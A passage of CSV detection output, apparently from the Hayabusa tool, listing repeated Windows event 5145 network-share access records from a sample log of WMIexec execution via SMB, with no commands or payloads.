Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.795 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.795 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.795 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.795 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.811 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.842 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.842 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.842 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.842 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.842 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.842 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.842 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.842 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.858 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.858 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.858 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.858 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.858 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.873 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.873 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.873 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.873 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.873 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.873 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.873 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.890 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.890 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.890 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.890 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.890 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.890 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.890 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.890 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 